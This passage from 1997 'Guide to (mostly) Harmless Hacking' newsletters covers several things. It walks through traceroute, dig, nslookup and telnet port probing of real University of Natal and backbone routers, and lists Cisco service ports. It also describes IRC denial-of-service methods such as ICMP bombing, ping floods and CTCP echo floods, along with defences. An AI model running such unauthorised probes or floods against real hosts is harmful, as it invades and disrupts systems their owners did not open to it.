10 sl-stk-1-H11/0-T3.sprintlink.net (144.228.10.109) 313 ms 479 ms 473 ms
11 sl-stk-2-F/T.sprintlink.net (198.67.6.2) 179 ms * *
12 sl-dc-7-H4/0-T3.sprintlink.net (144.228.10.106) 164 ms * 176 ms
13 sl-dc-7-F/T.sprintlink.net (198.67.0.1) 143 ms 129 ms 134 ms
14 gsl-dc-3-Fddi0/0.gsl.net (204.59.144.197) 135 ms 152 ms 130 ms
15 204.59.225.66 (204.59.225.66) 583 ms 545 ms 565 ms
16 * * *
17 e0.csir00.uni.net.za (155.232.249.1) 516 ms 436 ms 400 ms
18 s1.und00.uni.net.za (155.232.70.1) 424 ms 485 ms 492 ms
19 e0.und01.uni.net.za (155.232.190.2) 509 ms 530 ms 459 ms
20 s0.und02.uni.net.za (155.232.82.2) 650 ms * 548 ms
21 Gw-Uninet1.CC.und.ac.za (146.230.196.1) 881 ms 517 ms 478 ms
22 cisco-unp.und.ac.za (146.230.128.8) 498 ms 545 ms *
23 IN.ee.und.ac.za (146.230.192.18) 573 ms 585 ms 493 msSo what does all this stuff mean?
The number in front of each line is the number of hops since leaving the computer that has the shell account I am using.
The second entry is the name of the computer through which this route passes, first in text, and then in parentheses its numerical representation.
The numbers after that are the time in milliseconds it takes for each of three probe packets in a row to make that hop. When an * appears, the time for the hop timed out. In the case of this traceroute command, any time greater than 3 seconds causes an * to be printed out.
How about hop 16? It gave us no info whatsoever. That silent gateway may be the result of a bug in the 4.1, 4.2 or 4.3BSD Unix network code. A computer running one of these operating systems sends an “unreachable” message. Or it could be something else. Sorry, I’m not enough of a genius yet to figure out this one for sure. Are we having phun yet?
************************
Evil genius tip: If you want to get really, truly excruciating detail on the traceroute command, while in your shell account type in the command:->man traceroute
I promise, on-line manual stuff is often written in a witty, entertaining fashion. Especially the Sun OS manual. Honest!
************************************************
Note for the shell-account-challenged: If you have Windows 95, you can get the same results -- I mean, for mapping the Internet, not going to jail -- using the “tracert” command. Here’s how it works:1. Open a PPP connection. For example, if you use Compuserve or AOL, make a connection, then minimize your on-line access program.
2. Click on the Start menu.
3. Open a DOS window.
4. At the DOS prompt type in “tracert <distant.computer.com> where “distant.computer.com” is replaced by the name of the computer to which you want to trace a route. Press the Enter key.
5. Be patient. Especially if your are tracing a route to a distant computer, it takes awhile to make all the connections. Every time your computer connects to another computer on the Internet, it first has to trace a route to the other computer. That’s why it sometimes take a long while for your browser to start downloading a Web page.
6. If you decide to use Windows for this hacking lesson, Damien Sorder has a message for us: “DON'T ENCOURAGE THEM TO USE WIN95!@#$!@#!” He’s right, but since most of you reading this are consenting adults, I figure it’s your funeral if you stoop to Windows hacking on an AOL PPP connection!
***********************Now this is getting interesting. We know that Daisy is directly connected to at least one other computer, and that computer in turn is connected to cisco-unp.und.ac.za. Let’s learn a little something about this cisco-unp.und.ac.za, OK?
First, we can guess from the name that is it a Cisco router. In fact, the first hop in this route is to a computer named “sisco,” which is also probably a Cisco router. Since 85% of the routers in the world are Ciscos, that’s a pretty safe bet. But we are going to not only make sure cisco-unp.und.ac.za is a Cisco. We are also going to find out the model number, and a few other goodies.
First we try out whois:
->whois cisco-unp.und.ac.za
No match for "CISCO-UNP.UND.AC.ZA".The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.Huh? Traceroute tells us cisco-unp.und.ac.za exists, but whois can’t find it! Actually this is a common problem, especially trying to use whois on distant computers. What do we do next? Well, if you are lucky, the whereis command will turn up another incredibly cool program: dig!
**********************
Newbie note: Dig stands for “domain information groper.” It does a lot of the same things as nslookup. But dig is a much older program, in many ways harder to use than nslookup. For details on dig, use the command from your shell account “man dig.”
**********************In fact, on my shell account I found I could run dig straight from my bash prompt:
->dig CISCO-UNP.UND.AC.ZA
; <<>> DiG 2.0 <<>> CISCO-UNP.UND.AC.ZA
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6
;; flags: qr aa rd ra; Ques: 1, Ans: 4, Auth: 5, Addit: 5
;; QUESTIONS:
;; CISCO-UNP.UND.AC.ZA, type = A, class = IN;; ANSWERS:
CISCO-UNP.UND.AC.ZA. 86400 A 146.230.248.1
CISCO-UNP.UND.AC.ZA. 86400 A 146.230.12.1
CISCO-UNP.UND.AC.ZA. 86400 A 146.230.60.1
CISCO-UNP.UND.AC.ZA. 86400 A 146.230.128.8;; AUTHORITY RECORDS:
und.ac.za. 86400 NS Eagle.und.ac.za.
und.ac.za. 86400 NS Shrike.und.ac.za.
und.ac.za. 86400 NS ucthpx.uct.ac.za.
und.ac.za. 86400 NS hiPPo.ru.ac.za.
und.ac.za. 86400 NS Rain.psg.com.;; ADDITIONAL RECORDS:
Eagle.und.ac.za. 86400 A 146.230.128.15
Shrike.und.ac.za. 86400 A 146.230.128.13
ucthpx.uct.ac.za. 86400 A 137.158.128.1
hiPPo.ru.ac.za. 86400 A 146.231.128.1
Rain.psg.com. 14400 A 147.28.0.34;; Total query time: 516 msec
;; FROM: llama to SERVER: default -- 198.59.115.2
;; WHEN: Fri Jan 17 13:03:49 1997
;; MSG SIZE sent: 37 rcvd: 305Ahhh, nice. The first few lines, the ones preceded by the ;; marks, mostly tell what the default settings of the command are and what we asked it. The line “Ques: 1, Ans: 4, Auth: 5, Addit: 5” tells us how many items we’ll get under each topic of questions, answers, authority records, and additional records. (You will get different numbers on that line with different queries.) This “records” stuff refers to information stored under the domain name system.
We learn from dig is that CLASS=IN, meaning CISCO-UNP.UND.AC.ZA is a domain name within the Internet. But we already knew that . The first really *new* thing we learn is that four routers all share the same domain name. We can tell that because their numerical Internet numbers are different. The reverse can also happen: several domain names can all belong to the same numerical address. If you use the dig command on each link in the route to DAISY.EE.UND.AC.ZA, you’ll find a tremendous variation in whether the routers map to same or different domain names. As hackers, we want to get wise to all these variations in how domain names are associated with boxes.
But we can still learn even more about that Cisco router named CISCO-UNP.UND.AC.ZA. We go back to nslookup and run it in interactive mode:
->/usr/etc/nslookup
Default Server: swcp.com
Address: 198.59.115.2
>Now let’s do something new with nslookup. This is a command that comes in really, really handy when we’re playing vigilante and need to persecute a spammer or bust a child porn Web site or two. Here’s how we can get the email address for the sysadmin of an Internet host computer.
> set type=soa
Then I enter the name of the computer about which I am curious. Note that I put a period after the end of the host name. It often helps to do this with nslookup:
> CISCO-UNP.UND.AC.ZA.
Server: swcp.com
Address: 198.59.115.2*** No start of authority zone information is available for CISCO-UNP.UND.AC.ZA.
Now what do I do? Give up? No, I’m a hacker wannabe, right? So I try entering just part of the domain name, again remembering to put a period at the end:
> und.ac.za.
Server: swcp.com
Address: 198.59.115.2
und.ac.za origin = Eagle.und.ac.za
mail addr = postmaster.und.ac.za
serial=199610255, refresh=10800, retry=3600, expire=3000000, min=86400
Eagle.und.ac.za inet address = 146.230.128.15
Shrike.und.ac.za inet address = 146.230.128.13
ucthpx.uct.ac.za inet address = 137.158.128.1
hiPPo.ru.ac.za inet address = 146.231.128.1
Rain.psg.com inet address = 147.28.0.34Bingo!!! I got the email address of a sysadmin whose domain includes that Cisco router, AND the IP addresses of some other boxes he or she administers. But notice it doesn’t list any of those routers which the sysadmin undoubtedly knows a thing or two about.
But we aren’t done yet with cisco-unp.und.ac.za (146.230.128.8). Of course we have a pretty good guess that it is a Cisco router. But why stop with a mere guess when we can port surf? So we fall back on our friend the telnet program and head for port 2001:
->telnet 146.230.128.8 2001
Trying 146.230.128.8 ...
Connected to 146.230.128.8.
Escape character is '^]'.
C
****************************************************
*** Welcome to the University of Natal ***
*** ***
*** Model : Cisco 4500 with ATM and 8 BRI ports ***
*** ***
*** Dimension Data Durban - 031-838333 ***
*** ***
***************************************************Hey, we know now that this is a Cisco model 4500 owned by the University of Natal, and we even got a phone number for the sysadmin. From this we also can infer that this router handles a subnet which serves the U of Natal and includes daisy.
But why did I telnet to port 2001? It’s in common use among routers as the administrative port. How do I know that? From the RFC (request for comments) that covers all commonly used port assignments. You can find a copy of this RFC at http://www.internic.net/help/domain/rfc1739.txt. Read it and you’ll be in for some happy port surfing!
************************
Evil Genius tip: there are a bunch of ports used by Cisco routers:
cisco-fna 130/tcp cisco FNATIVE
cisco-tna 131/tcp cisco TNATIVE
cisco-sys 132/tcp cisco SYSMAINT
licensedaemon 1986/tcp cisco license management
tr-rsrb-p1 1987/tcp cisco RSRB Priority 1 port
tr-rsrb-p2 1988/tcp cisco RSRB Priority 2 port
tr-rsrb-p3 1989/tcp cisco RSRB Priority 3 port
stun-p1 1990/tcp cisco STUN Priority 1 port
stun-p2 1991/tcp cisco STUN Priority 2 port
stun-p3 1992/tcp cisco STUN Priority 3 port
snmp-tcp-port 1993/tcp cisco SNMP TCP port
stun-port 1994/tcp cisco serial tunnel port
perf-port 1995/tcp cisco perf port
tr-rsrb-port 1996/tcp cisco Remote SRB port
gdp-port 1997/tcp cisco Gateway Discovery Protocol
x25-svc-port 1998/tcp cisco X.25 service (XOT)
tcp-id-port 1999/tcp cisco identification port
************************But what about the “normal” telnet port, which is 23? Since it is the “normal” port, the one you usually go to when you want to log in, we don’t need to put the 23 after the host name:
->telnet 146.230.128.8
Trying 146.230.128.8 ...
Connected to 146.230.128.8.
Escape character is '^]'.
C
*************************************************************************
*** Welcome to the University of Natal ***
*** ***
*** Model : Cisco 4500 with ATM and 8 BRI ports ***
*** ***
*** Dimension Data Durban - 031-838333 ***
*** ***
*************************************************************************User Access Verification
Password:
Hey, this is interesting, no username requested, just a password. If I were the sysadmin, I’d make it a little harder to log in. Hmmm, what happens if I try to port surf finger that site? That means telnet to the finger port, which is 79:
->telnet 146.230.128.8 79
Trying 146.230.128.8 ...
Connected to 146.230.128.8.
Escape character is '^]'.
C
*************************************************************************
*** Welcome to the University of Natal ***
*** ***
*** Model : Cisco 4500 with ATM and 8 BRI ports ***
*** ***
*** Dimension Data Durban - 031-838333 ***
*** ***
*************************************************************************
Line User Host(s) Idle Location
* 2 vty 0 idle 0 kitsune.swcp.com
BR0:2 Sync PPP 00:00:00
BR0:1 Sync PPP 00:00:00
BR1:2 Sync PPP 00:00:00
BR1:1 Sync PPP 00:00:00
BR2:2 Sync PPP 00:00:01
BR2:1 Sync PPP 00:00:00
BR5:1 Sync PPP 00:00:00
Connection closed by foreign host.Notice that finger lists the connection to the computer I was port surfing from: kitsune. But no one else seems to be on line just now. Please remember, when you port surf, unless you know how to do IP spoofing, your target computer knows where you came from. Of course I will be a polite guest.
Now let’s try the obvious. Let’s telnet to the login port of daisy. I use the numerical address just for the heck of it:
->telnet 146.230.192.18
Trying 146.230.192.18 ...
Connected to 146.230.192.18.
Escape character is '^]'.NetBSD/i386 (daisy.ee.und.ac.za) (ttyp0)
login:
Hey, this is interesting. Since we now know this is a university, that’s probably the electrical engineering (EE) department. And NetBSD is a freeware Unix that runs on a PC! Probably a 80386 box.
Getting this info makes me almost feel like I’ve been hanging out at the University of Natal EE computer lab. It sounds like a friendly place. Judging from their router, security is somewhat lax, they use cheap computers, and messages are friendly. Let’s finger and see who’s logged in just now:
Since I am already in the telnet program (I can tell by the prompt “telnet>“), I go to daisy using the “open” command:
telnet> open daisy.ee.und.ac.za 79
Trying 146.230.192.18 ...
telnet: connect: Connection refused
telnet> quitWell, that didn’t work, so I exit telnet and try the finger program on my shell account computer:
->finger @daisy.ee.und.ac.za
[daisy.ee.und.ac.za]
finger: daisy.ee.und.ac.za: Connection refusedSigh. It’s hard to find open finger ports any more. But it’s a good security practice to close finger. Damien Sorder points out, “If you install the new Linux distributions, it comes with Cfingerd. Why would I (and others) want to shut it down? Not because of hackers and abuse or some STUPID S*** like that. Because it gives out way too much information when you finger a single user. You get machine load and all the user information.”
I manage to pull up a little more info on how to map the interconnections of University of Natal computers with an search of the Web using http://digital.altavista.com. It links me to the site http://www.frd.ac.za/uninet/sprint.html, which is titled “Traffic on the UNINET-SPRINTLINK Link.” However, all the links to netwrok traffic statistics from that site are dead.
Next, let’s look into number 20 on that traceroute that led us to the University of Natal. You can pretty much expect that links in the middle of a long traceroute will be big computers owned by the bigger companies that form the backbone of the Internet.
->telnet 155.232.82.2 2001
Trying 155.232.82.2 ...
Connected to 155.232.82.2.
Escape character is '^]'.Id: und02
Authorised Users Only!
------------------------
User Access Verification
Username:
Yup, we’re out of friendly territory now. And since port 2001 works, it may be a router. Just for laughs, though, let’s go back to the default telnet port:
->telnet 155.232.82.2
Trying 155.232.82.2 ...
Connected to 155.232.82.2.
Escape character is '^]'.Id: und02
Authorised Users Only!
------------------------
User Access Verification
Username:
Now just maybe this backbone-type computer will tell us gobs of stuff about all the computers it is connected to. We try telneting to the netstat port, 15. This, if it happens to be open to the public, will tell us all about the computers that connect through it:
->telnet 155.232.82.2 15
Trying 155.232.82.2 ...
telnet: connect: Connection refusedSigh. I gave an example of the incredible wealth of information you can get from netstat on the GTMHH on port surfing. But every day it is harder to find a public netstat port. That’s because the information netstat gives is so useful to computer criminals. In fact, port 15 is no longer reserved as the netstat port (as of 1994, according to the RFC). So you will find few boxes using it.
******************************
Newbie note: want to know what port assignments your ISP uses? Sorder points out “ /etc/services on most machines will [tell you this].”How can you can read that information? Try this:
First, change to the /etc/ directory:
->cd /etc
Then command it to print it out to your screen with:
->more services
#
# @(#)services 1.16 90/01/03 SMI
#
# Network services, Internet style
# This file is never consulted when the NIS are running
#
tcpmux 1/tcp # rfc-1078
echo 7/tcp... and so on...
Alas, just because your shell account has a list of port assignments doesn’t mean they are actually in use. It also probably won’t list specialized services like all those Cisco router port assignments.
*************************In fact, after surfing about two dozen somewhat randomly chosen netstat ports, the only answer I get other than “Connection refused” is:
->telnet ns.nmia.com 15
Trying 198.59.166.10 ...
Connected to ns.nmia.com.
Escape character is '^]'.
Yes, but will I see the EASTER BUNNY in skintight leather
at an IRON MAIDEN concert?Now what about all those Sprintlink routers in that traceroute? That’s a major Internet backbone based in the US provided by Sprint. You can get some information on the topology of the Sprintlink backbone at http://www.sprintlink.net/SPLK/HB21.html#2.2. Alas, Sprintlink used to give out much more information than they do today. All I can pick up on their Web site today is pretty vague.
Sigh. The Internet is getting less friendly, but more secure. Some day when we’re really ancient, say five years from now, we’ll be telling people, “Why, I remember when we could port surf! Why, there used to be zillions of open ports and people could choose ANY password they wanted. Hmph! Today it’s just firewalls everywhere you look!” Adds Sorder, “Gee. How do you think people like me feel.. port surfing over 6 years ago.”
Our thanks to Damien Sorder (jericho@dimensional.com) for assistance in reviewing and contributing to this GTMHH.
_________________________________________________________
Subscribe to our email list by emailing to hacker@techbroker.com with message "subscribe" or join our Hacker forum at http://www.infowar.com/cgi-shl/login.exe.
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Please direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1997 Carolyn P. Meinel. You may forward or post on your Web site this GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end..
________________________________________________________
___________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 Number 3
How to keep from getting kicked off IRC!
____________________________________________________________Our thanks to Patrick Rutledge, Warbeast, Meltdown and k1neTiK, who all provided invaluable information on the burning question of the IRC world: help, they’re nuking meee...
What’s the big deal about IRC and hackers? Sheesh, IRC is sooo easy to use... until you get on a server where hacker wars reign. What the heck do you do to keep from getting clobbered over and over again?
Of course you could just decide your enemies can go to heck. But let’s say you’d rather hang in there. You may want to hang in there because if you want to make friends quickly in the hacker world, one of the best ways is over Internet Relay Chat (IRC).
On IRC a group of people type messages back and forth on a screen in almost real time. It can be more fun than Usenet where it can take from minutes to hours for people’s replies to turn up. And unlike Usenet, if you say something you regret, it’s soon gone from the screen. Ahem. That is, it will soon be gone if no one is logging the session.
In some ways IRC is like CB radio, with lots of folks flaming and making fools of themselves in unique and irritating ways. So don’t expect to see timeless wisdom and wit scrolling down your computer screen. But because IRC is such an inexpensive way for people from all over the world to quickly exchange ideas, it is widely used by hackers. Also, given the wars you can fight for control of IRC channels, it can give you a good hacker workout.
To get on IRC you need both an IRC client program and you need to connect to a Web site or Internet Service Provider (ISP) that is running an IRC server program.
***********************
Newbie note: Any program that uses a resource is called a “client.” Any program that offers a resource is a “server.” Your IRC client program runs on either your home computer or shell account computer and connects you to an IRC server program which runs on a remote computer somewhere on the Internet.
***********************You may already have an IRC server running on your ISP. Customer service at your ISP should be able to help you with instructions on how to use it. Even easier yet, if your Web browser is set up to use Java, you can run IRC straight from your browser once you have surfed into a Web-based IRC server.
Where are good IRC servers for meeting other hackers?
There are several IRC servers that usually offer hacker channels. EFNet (Eris-Free Network)links many IRC servers. It was originally started by the Eris FreeNet (ef.net). It is reputed to be a “war ground” where you might get a chance to really practice the IRC techniques we cover below.
Undernet is one of the largest networks of IRC servers. The main purpose of Undernet is to be a friendly place with IRC wars under control. But this means, yes, lots of IRC cops! The operators of these IRC servers have permission to kill you not only from a channel but also from a server. Heck, they can ban you for good. They can even ban your whole domain.
************************************
Newbie note: A domain is the last two (or sometimes three or four) parts of your email address. For example, aol.com is the domain name for America Online. If an IRC network were to ban the aol.com domain, that would mean every single person on America Online would be banned from it.
************************************************************************
You can get punched in the nose warning: If the sysadmins at your ISP were to find out that you had managed to get their entire domain banned from an IRC net on account of committing ICMP bombing or whatever, they will be truly mad at you! You will be lucky if the worst that happens is that you lose your account. You’d better hope that word doesn’t get out to all the IRC addicts on your ISP that you were the dude that got you guys all kicked out.
************************************IRCNet is probably the same size if not larger than Undernet. IRCNet is basically the European/Australian split off from the old EFNet.
Yes, IRC is a world-wide phenomenon. Get on the right IRC network and you can be making friends with hackers on any continent of the planet. There are at least 80 IRC networks in existence. To learn how to contact them, surf over to: http://www.irchelp.org/. You can locate additional IRC servers by surfing over to http://hotbot.com or http://digital.altavista.com and searching for “IRC server.” Some IRC servers are ideal for the elite hacker, for example the l0pht server. Note that is a “zero” not an “O” in l0pht.
****************************************
Evil genius tip: Get on an IRC server by telneting straight in through port 6667 at the domain name for that server.
****************************************But before you get too excited over trying out IRC, let us warn you. IRC is not so much phun any more because some d00dz aren’t satisfied with using it to merely say naughty words and cast aspersions on people’s ancestry and grooming habits. They get their laughs by kicking other people off IRC entirely. This is because they are too chicken to start brawls in bars. So they beat up on people in cyberspace where they don’t have to fret over getting ouchies.
But we’re going to show some simple, effective ways to keep these lusers from ruining your IRC sessions. However, first you’ll need to know some of the ways you can get kicked off IRC by these bullies.
The simplest way to get in trouble is to accidentally give control of your IRC channel to an impostor whose goal is to kick you and your friends off.
You see, the first person to start up a channel on an IRC server is automatically the operator (OP). The operator has the power to kick people off or invite people in. Also, if the operator wants to, he or she may pass operator status on to someone else.
Ideally, when you leave the channel you would pass this status on to a friend your trust. Also, maybe someone who you think is your good buddy is begging you to please, please give him a turn being the operator. You may decide to hand over the OP to him or her in order to demonstrate friendship. But if you mess up and accidentally OP a bad guy who is pretending to be someone you know and trust, your fun chat can become history.
One way to keep this all this obnoxious stuff from happening is to simply not OP people you do not know. But this is easier said than done. It is a friendly thing to give OP to your buddies. You may not want to appear stuck up by refusing to OP anyone. So if you are going to OP a friend, how can you really tell that IRC dude is your friend?
Just because you recognize the nick (nickname), don’t assume it’s who you think it is! Check the host address associated with the nick by giving the command "/whois IRCnick" where “IRCnick” is the nickname of the person you want to check.
This “/whois” command will give back to you the email address belonging to the person using that nick. If you see, for example, “d***@wannabe.net” instead of the address you expected, say friend@cool.com, then DO NOT OP him. Make the person explain who he or she is and why the email address is different.
But entering a fake nick when entering an IRC server is only the simplest of ways someone can sabotage an IRC session. Your real trouble comes when people deploy “nukes” and “ICBMs” against you.
“Nuking” is also known as “ICMP Bombing.” This includes forged messages such as EOF (end of file), dead socket, redirect, etc.
**************************************
Newbie note: ICMP stands for Internet Control Message Protocol. This is an class of IRC attacks that go beyond exploiting quirks in the IRC server program to take advantage of major league hacking techniques based upon the way the Internet works.
**************************************
**************************************
You can go to jail warning: ICMP attacks constitute illegal denial of service attacks. They are not just harmless harassment of a single person on IRC, but may affect an entire Internet host computer, disputing service to all who are using it.
***************************************For example, ICMP redirect messages are used by routers to tell other computers “Hey, quit sending me that stuff. Send it to routerx.foobar.net instead!” So an ICMP redirect message could cause your IRC messages to go to bit heaven instead of your chat channel.
EOF stands for “end of file.” “Dead socket” refers to connections such as your PPP session that you would be using with many IRC clients to connect to the Internet. If your IRC enemy spoofs a message that your socket is dead, your IRC chat session can’t get any more input from you. That’s what the program “ICMP Host Unreachable Bomber for Windows” does.
Probably the most devastating IRC weapon is the flood ping, known as “ICBM flood or ICMPing.” The idea is that a bully will find out what Internet host you are using, and then give the command “ping-f” to your host computer. Or even to your home computer. Yes, on IRC it is possible to identify the dynamically assigned IP address of your home computer and send stuff directly to your modem! If the bully has a decent computer, he or she may be able to ping yours badly enough to briefly knock you out of IRC. Then this character can take over your IRC session and may masquerade as you.
**********************
Newbie note: When you connect to the Internet with a point-to-point (PPP) connection, your ISP’s host computer assigns you an Internet Protocol (IP) address which may be different every time you log on. This is called a “dynamically assigned IP address.” In some cases, however, the ISP has arranged to assign the uses the same IP address each time.
**********************Now let’s consider in more detail the various types of flooding attacks on IRC.
The purpose of flooding is to send so much garbage to a client that its connection to the IRC server either becomes useless or gets cut off.
Text flooding is the simplest attack. For example, you could just hold down the “x” key and hit enter from time to time. This would keep the IRC screen filled with your junk and scroll the others’ comments quickly off the screen. However, text flooding is almost always unsuccessful because almost any IRC client (the program you run on your computer) has text flood control. Even if it doesn’t, text must pass through an IRC server. Most IRC servers also have text flood filters.
Because text flooding is basically harmless, you are unlikely to suffer anything worse than getting banned or possibly K:lined for doing it.
******************************************
Newbie note: “K:line” means to ban not just you, but anyone who is in your domain from an IRC server. For example, if you are a student at Giant State University with an email address of IRCd00d@giantstate.edu, then every person whose email address ends with “giantstate.edu” will also be banned.
*******************************************Client to Client Protocol (CTCP) echo flooding is the most effective type of flood. This is sort of like the ping you send to determine whether a host computer is alive. It is a command used within IRC to check to see if someone is still on your IRC channel.
How does the echo command work? To check whether someone is still on your IRC channel, give the command “/ctcp nick ECHO hello out there!” If “nick” (where “nick” is the IRC nickname of the person you are checking out) is still there, you get back “nick HELLO OUT THERE.”
What has happened is that your victim’s IRC client program has automatically echoed whatever message you sent.
But someone who wants to boot you off IRC can use the CTCP echo command to trick your IRC server into thinking you are hogging the channel with too much talking. This is because most IRC servers will automatically cut you off if you try text flooding.
So CTCP echo flooding spoofs the IRC into falsely cutting someone off by causing the victim’s IRC client to automatically keep on responding to a whole bunch of echo requests.
Of course your attacker could also get booted off for making all those CTCP echo requests. But a knowledgeable attacker will either be working in league with some friends who will be doing the same thing to you or else be connected with several different nicks to that same IRC server. So by having different versions of him or herself in the form of software bots making those CTCP echo requests, the attacker stays on while the victim gets booted off.
This attack is also fairly harmless, so people who get caught doing this will only get banned or maybe K:lined for their misbehavior.
******************************
Newbie note: A “bot” is a computer program that acts kind of like a robot to go around and do things for you. Some bots are hard to tell from real people. For example, some IRC bots wait for someone to use bad language and respond to these naughty words in annoying ways.
**************************************************************************
You can get punched in the nose warning: Bots are not permitted on the servers of the large networks. The IRC Cops who control hacker wars on these networks love nothing more than killing bots and banning the botrunners that they catch.
**************************************A similar attack is CATCH ping. You can give the command “/ping nick” and the IRC client of the guy using that nick would respond to the IRC server with a message to be passed on to the guy who made the ping request saying “nick” is alive, and telling you how long it took for nick’s IRC client program to respond. It’s useful to know the response time because sometimes the Internet can be so slow it might take ten seconds or more to send an IRC message to other people on that IRC channel. So if someone seems to be taking a long time to reply to you, it may just be a slow Internet.
Your attacker can also easily get the dynamically assigned IP (Internet protocol) address of your home computer and directly flood your modem. But just about every Unix IRC program has at least some CATCH flood protection in it. Again, we are looking at a fairly harmless kind of attack.
So how do you handle IRC attacks? There are several programs that you can run with your Unix IRC program. Examples are the programs LiCe and Phoenix. These scripts will run in the background of your Unix IRC session and will automatically kick in some sort of protection (ignore, ban, kick) against attackers.
If you are running a Windows-based IRC client, you may assume that like usual you are out of luck. In fact, when I first got on an IRC channel recently using Netscape 3.01 running on Win 95, the *first* thing the denizens of #hackers did was make fun of my operating system. Yeah, thanks. But in fact there are great IRC war programs for both Windows 95 and Unix.
For Windows 95 you may wish to use the mIRC client program. You can download it from http://www.super-highway.net/users/govil/mirc40.html. It includes protection from ICMP ping flood. But this program isn’t enough to handle all the IRC wars you may encounter. So you may wish to add the protection of the most user-friendly, powerful Windows 95 war script around: 7th Sphere. You can get it from http://www.localnet.com/~marcraz/.
If you surf IRC from a Unix box, you’ll want to try out IRCII. You can download it from ftp.undernet.org , in the directory /pub/irc/clients/unix, or http://www.irchelp.org/, or ftp://cs-ftp.bu.edu/irc/. For added protection, you may download LiCe from ftp://ftp.cibola.net/pub/irc/scripts. Ahem, at this same site you can also download the attack program Tick from /pub/irc/tick. But if you get Tick, just remember our “You can get punched in the nose” warning!
*********************************
Newbie note: For detailed instructions on how to run these IRC programs, see
At http://www.irchelp.org/. Or go to Usenet and check out alt.irc.questions
******************************************************************
Evil genius tip: Want to know every excruciating technical detail about IRC? Check out RFC 1459 (The IRC protocol). You can find many copies of this ever popular RFC (Request for Comments) by doing a Web search.
********************************Now let’s suppose you are all set up with an industrial strength IRC client program and war scripts. Does this mean you are ready to go to war on IRC?
Us Happy Hacker folks don’t recommend attacking people who take over OP status by force on IRC. Even if the other guys start it, remember this. If they were able to sneak into the channel and get OPs just like that, then chances are they are much more experienced and dangerous than you are. Until you become an IRC master yourself, we suggest you do no more than ask politely for OPs back.
Better yet, "/ignore nick" the l00zer and join another channel. For instance, if #evilhaxorchat is taken over, just create #evilhaxorchat2 and "/invite IRCfriend" all your friends there. And remember to use what you learned in this Guide about the IRC whois command so that you DON’T OP people unless you know who they are.
As Patrick Rutledge says, this might sound like a wimp move, but if you don't have a fighting chance, don't try - it might be more embarrassing for you in the long run. And if you start IRC warrioring and get K:lined off the system, just think about that purple nose and black eye you could get when all the other IRC dudes at your ISP or school find out who was the luser who got everyone banned.
That’s it for now. Now don’t try any funny stuff, OK? Oh, no, they’re nuking meee...
____________________________________________________________
Subscribe to our discussion list by emailing to hacker@techbroker.com with message "subscribe"
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
________________________________________________________
___________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol 3 Number 4
How to Read Email Headers and Find Internet Hosts
Warning: flamebait enclosed!
____________________________________________________________OK, OK, you 31337 haxors win. I’m finally releasing the next in our series of Guides oriented toward the intermediate hacker.
Now some of you may think that headers are too simple or boring to waste time on. However, a few weeks ago I asked the 3000+ readers of the Happy Hacker list if anyone could tell me exactly what email tricks I was playing in the process of mailing out the Digests. But not one person replied with a complete answer -- or even 75% of the answer -- or even suspected that for months almost all Happy Hacker mailings have doubled as protests. The targets: ISPs offering download sites for email bomber programs. Conclusion: it is time to talk headers!
In this Guide we will learn:
· what is a header
· why headers are fun
· how to see full headers
· what all that stuff in your headers means
· how to get the names of Internet host computers from your headers
· the foundation for understanding the forging of email and Usenet posts, catching the people who forge headers, and the theory behind those email bomber programs that can bring an entire Internet Service Provider (ISP) to its kneesThis is a Guide you can make at least some use of without getting a shell account or installing some form of Unix on your home computer. All you need is to be able to send and receive email, and you are in business. However, if you do have a shell account, you can do much more with deciphering headers. Viva Unix!
Headers may sound like a boring topic. Heck, the Eudora email program named the button you click to read full headers “blah blah blah.” But all those guys who tell you headers are boring are either ignorant -- or else afraid you’ll open a wonderful chest full of hacker insights. Yes, every email header you check out has the potential to unearth a treasure hidden in some back alley of the Internet.
Now headers may seem simple enough to be a topic for one of our Beginners’ Series Guides. But when I went to look up the topic of headers in my library of manuals, I was shocked to find that most of them don’t even cover the topic. The two I found that did cover headers said almost nothing about them. Even the relevant RFC 822 is pretty vague. If any of you super-vigilant readers looking for flame bait happen to know of any literature that *does* cover headers in detail, please include that information in your tirades!
*********************************************
Technical tip: Information relevant to headers may be extracted from Requests for Comments (RFCs) 822 (best), as well as 1042, 1123, 1521 and 1891 (not a complete list). To read them, take your Web browser to http://altavista.digital.com and search for “RFC 822” etc.
*********************************************Lacking much help from manuals, and finding that RFC 822 didn’t answer all my questions, the main way I researched this article was to send email back and forth among some of my accounts, trying out many variations in order to see what kinds of headers they generated. Hey, that’s how real hackers are supposed to figure out stuff when RTFM (read the fine manual) or RTFRFC (read the fine RFC)doesn’t tell us as much as we want to know. Right?
One last thing. People have pointed out to me that every time I put an email address or domain name in a Guide to (mostly) Harmless Hacking, a zillion newbies launch botched hacking attacks against these. All email addresses and domain names below have been fubarred.
************************************************
Newbie note: The verb “to fubar” means to obscure email addresses and Internet host addresses by changing them. Ancient tradition holds that it is best to do so by substituting “foobar” or “fubar” for part of the address.
************************************************WHAT ARE HEADERS?
If you are new to hacking, the headers you are used to seeing may be incomplete. Chances are that when you get email it looks something like this:
From: Vegbar Fubar <fooha@ifi.foobar.no>
Date: Fri, 11 Apr 1997 18:09:53 GMT
To: hacker@techbroker.comBut if you know the right command, suddenly, with this same email message, we are looking at tons and tons of stuff:
Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)
for techbr@fooway.net id OAA07210; Fri, 11 Apr 1997 14:10:06 -0400
Received: from ifi.foobar.no by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI)
